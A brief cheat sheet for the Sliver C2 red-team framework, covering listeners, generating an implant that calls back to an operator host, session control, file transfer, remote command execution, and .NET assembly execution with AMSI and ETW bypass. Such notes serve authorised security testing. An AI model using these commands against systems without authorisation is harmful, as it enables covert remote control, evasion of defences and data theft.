Sliver C2

Sliver is an open source cross-platform adversary emulation/red team framework, it can be used by organizations of all sizes to perform security testing. (Not only for Windows)

Setup

# Start Sliver service
sudo systemctl start sliver

# Start Sliver server
sliver

# Start listening job on http(s)
http
https

# Generate implant for https / http
generate --http <my_host>

General Commands

# List sessions
sessions

# Use session
use <session_id>

# Rename session
rename <name>

# Download / Upload
download <path-remote-file>
upload <path-local-file>

# Execute command and see output
execute -o <program> <arguments>

Windows commands

# Execute assembly in same process + bypass AMSI and ETW (only .NET)
execute-assembly -i -M -E /path/to/local/file.exe <arguments>

# Side load executable to process
sideload /path/to/local/file.exe <arguments>

Last updated